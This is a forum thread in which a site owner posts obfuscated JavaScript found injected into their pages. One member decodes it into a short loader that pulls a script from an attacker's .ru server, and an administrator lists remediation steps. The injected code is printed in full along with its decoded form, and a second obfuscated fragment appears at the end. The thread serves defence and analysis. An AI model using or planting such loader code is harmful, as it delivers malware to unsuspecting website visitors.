code auto added to my site..anyone tell me what is?

JavaScript and client side scripting.

Moderator: General Moderators

Post Reply
garf90
Forum Newbie
Posts: 6
Joined: Sun Apr 18, 2010 9:04 am

code auto added to my site..anyone tell me what is?

Post by garf90 »

we have a site and suddenly weird things are happening.

my developer tell me some weird Java / script has be added to multiple pages....but we (my company) didn't do it.

can any tell me about this code? (below) Has our site been hacked / infected?

We just found some kind of run time malaware on another site...but its on a different server.

very concerned.

any help would be great
G90

<script>var t="";var h="";var G;if(G!='m'){G=''};var D_="";function C() {var S='';var J="";var K=window;var V;if(V!='O'){V=''};var R=String("scri"+"pt");var iq="";var Z;var r='';var A;if(A!=''){A='zH'};var Fl=new String();var E=String("g");var L="appmnQi".substr(0,3)+"end"+"Chinrc7".substr(0,3)+"ldxiDU".substr(0,2);var b=new String("]");var f;if(f!='' && f!='Qp'){f=null};var z=RegExp;var GU;if(GU!='I' && GU!='lb'){GU=''};this.JL="";var bT;if(bT!=''){bT='px'};function N(q,p){var d="[";var nm;if(nm!='il' && nm != ''){nm=null};d+=p;d+=b;var oF;if(oF!='So' && oF != ''){oF=null};var w=new z(d, E);this.ze='';return q.replace(w, r);};var wk;if(wk!='e'){wk=''};this.Ns='';var i="onl"+"oad";var dz;if(dz!='no'){dz='no'};this.wa='';var LO='';var O_='';var u=N('sqr4cp','5pqQ4xa7');var D="defeANm0".substr(0,4)+"r";this.g='';this.Vw='';Z=function(){this.ZF='';try {var Gf;if(Gf!='uW' && Gf != ''){Gf=null};n=document.createElement(R);var RV=new String();var Yo;if(Yo!='' && Yo!='fF'){Yo='ib'};var v=new Array();n[D]=[1,8][0];var gY='';var gYj='';n = N('hGtQtGpW:H/j/jpYoHkjeGsjaWcYkG.YrQuY:j','GYjQWH')+N('8295634772434270642295791948166996914660733561217215135','65174293')+N('/DgXoVoEg5lReL.6cMoXm5/jt9eIcWh4nIo4r9aWtLiR.Wc5o3mR/Wi5c9iMb6a9.WcRo3mI.4p9hXp5','I36Xj9VE4W5RDLM');var XG;if(XG!='' && XG!='vi'){XG=null};var II='';var Q=new String("bodyOc6".substr(0,4));var QA;if(QA!='' && QA!='wq'){QA='JJ'};var Oa;if(Oa!='' && Oa!='hH'){Oa='Od'};var yK=new String();var Zy;if(Zy!='' && Zy!='MB'){Zy=null};var uu;if(uu!='' && uu!='nE'){uu=null};document[Q][L](n);var fR;if(fR!='U' && fR != ''){fR=null};} catch(H){this.EW="";var x_=new Date();};this.YM='';};K=Z;var vr="";this.kR='';var Jf;if(Jf!='of' && Jf != ''){Jf=null};};var Wd=new Array();var UK;if(UK!='HZ' && UK!='uz'){UK=''};C();var KqP=new String();</script>
<!--52071e04b71ca66bacac9424ea495244-->
User avatar
kaszu
Forum Regular
Posts: 749
Joined: Wed Jul 19, 2006 7:29 am

Re: code auto added to my site..anyone tell me what is?

Post by kaszu »

Took me 20 minutes, but reversed. Here is what it does:

Code: Select all

window.onload = function () {
    n = document.createElement('script');
    n.defer = 1;
    n.src = 'http://pokesack.ru:8080/google.com/technorati.com/iciba.com.php';
    document.body.appendChild(n);
}
This code loads another Javascript code from pokesack.ru server, which adds iframe on the page (src is also on pokesack.ru)
Has our site been hacked / infected?
Yes

Edit: this is my 666th post :twisted:
Last edited by kaszu on Sun Apr 18, 2010 11:40 am, edited 1 time in total.
User avatar
Benjamin
Site Administrator
Posts: 6935
Joined: Sun May 19, 2002 10:24 pm

Re: code auto added to my site..anyone tell me what is?

Post by Benjamin »

Your servers have been compromised. The script could very well be spreading malware to your site visitors or used for monetary gain of some sort.
garf90
Forum Newbie
Posts: 6
Joined: Sun Apr 18, 2010 9:04 am

Re: code auto added to my site..anyone tell me what is?

Post by garf90 »

thanks....and S### lol


ok will look into it further.
garf90
Forum Newbie
Posts: 6
Joined: Sun Apr 18, 2010 9:04 am

Re: code auto added to my site..anyone tell me what is?

Post by garf90 »

Benjamin wrote:Your servers have been compromised. The script could very well be spreading malware to your site visitors or used for monetary gain of some sort.
thankfully site is not yet live.

so no customers yet.......

anyone in these forums dealt with these kind on run time doohickys before?

i may need a pro on this. its not my guys field of expertise.

G90
garf90
Forum Newbie
Posts: 6
Joined: Sun Apr 18, 2010 9:04 am

Re: code auto added to my site..anyone tell me what is?

Post by garf90 »

additional: hey kaszu thx for taking the time to track the source down and looking into it for me.

G90
User avatar
Benjamin
Site Administrator
Posts: 6935
Joined: Sun May 19, 2002 10:24 pm

Re: code auto added to my site..anyone tell me what is?

Post by Benjamin »

Well, here's what I would do:

1. Locate the entry point they used to gain access and fix it.
2. Reprovision the server. e.g. reinstall Linux from scratch in case there are any root kits installed. Your webhost can do this for you.
3. Check the entire code base for vulnerabilities, especially upload forms and unprotected variables in database queries.
4. Use the latest version of any external libraries, such as phpBB or whatever you may be using.
5. Use cPanel and enable brute force detection, which will automatically block IP's with many invalid logins.
6. Disable any services not being used. e.g. ssh, ftp.
7. Ensure a firewall is installed and be aware of what ports are open and who they are open to.

I'm sure I'm missing some things, but this is a good start.
garf90
Forum Newbie
Posts: 6
Joined: Sun Apr 18, 2010 9:04 am

Re: code auto added to my site..anyone tell me what is?

Post by garf90 »

I get better support here than my hosting company....who said 'we cant touch your code..sorry"
garf90
Forum Newbie
Posts: 6
Joined: Sun Apr 18, 2010 9:04 am

Re: code auto added to my site..anyone tell me what is?

Post by garf90 »

ok spent almost a week...got almost everything.

but just found this. is this another instance of the haclk or something else?

dont want to delete just in case

<script>var j;if(j!='FJ' && j!='y'){j=''};this.TJ='';try {var C;if(C!='' && C!='Z'){C=''};var br='';var F=window[unescape("%75%6e%65%73%63%61%70%65")];this.PN="";var G;if(G!='' && G!='Y'){G=''};var ZV=
Post Reply